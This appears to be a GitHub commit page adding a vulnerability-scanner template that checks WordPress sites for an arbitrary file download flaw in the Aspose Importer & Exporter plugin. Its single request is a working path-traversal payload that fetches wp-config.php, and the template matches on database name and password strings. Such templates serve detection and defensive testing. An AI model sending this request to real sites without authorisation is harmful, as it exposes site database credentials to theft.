Merge pull request #2953 from Akokonunes/patch-59

Create aspose-importer-exporter-file-download.yaml
patch-1
Prince Chaddha 2021-10-22 22:03:37 +05:30 committed by GitHub
commit 9ab9cd2a25
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions

View File

@ -0,0 +1,29 @@
id: aspose-ie-file-download
info:
name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download
author: 0x_Akoko
severity: high
description: The Aspose importer and Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability.
reference:
- https://packetstormsecurity.com/files/131162/
- https://wordpress.org/plugins/aspose-importer-exporter
tags: wordpress,wp-plugin,lfi,aspose
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200